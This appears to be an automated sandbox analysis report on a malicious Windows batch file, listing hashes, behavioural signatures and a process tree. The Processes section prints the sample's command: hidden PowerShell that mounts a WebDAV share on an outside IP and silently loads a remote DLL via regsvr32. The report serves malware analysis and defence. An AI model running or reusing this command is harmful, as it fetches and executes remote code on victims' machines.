Analysis

  • max time kernel
    100s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    23/07/2024, 20:31

General

  • Target

    2973946871269414620.bat

  • Size

    10KB

  • MD5

    c92bd4a438ecdcec615706c361559e2b

  • SHA1

    c686178f71310ff82aa0fcae13dfb2eb46605a8d

  • SHA256

    f83a20c3c3e945153b381d7e4c76d49080a65710db2a1f4dc1030aefe27eaafd

  • SHA512

    7f5746377ab409234309182e43afd78931df694de33c897fd9502c1a3bdf85ecc6c7c2fe8ebb9704f791235648e488fac52210e804c23ab8ce83259aa6cedfdf

  • SSDEEP

    192:kK6bX6T//u/JvgOaekPJbh3HI5gZohxFzHt/p3pakb65SLX:DP/4gAcd3HI5SExZlCQ65SLX

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\2973946871269414620.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1592
    • C:\Program Files\Windows NT\Accessories\wordpad.exe
      "C:\Program Files\Windows NT\Accessories\wordpad.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      PID:2936
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\343446776461.dll
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2952
      • C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\
        3⤵
          PID:2892
        • C:\Windows\system32\regsvr32.exe
          "C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\343446776461.dll
          3⤵
            PID:2928

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1592-17-0x0000000002340000-0x0000000002440000-memory.dmp

        Filesize

        1024KB

      • memory/1592-16-0x0000000002340000-0x0000000002440000-memory.dmp

        Filesize

        1024KB

      • memory/2952-23-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

        Filesize

        2.9MB

      • memory/2952-24-0x0000000002960000-0x0000000002968000-memory.dmp

        Filesize

        32KB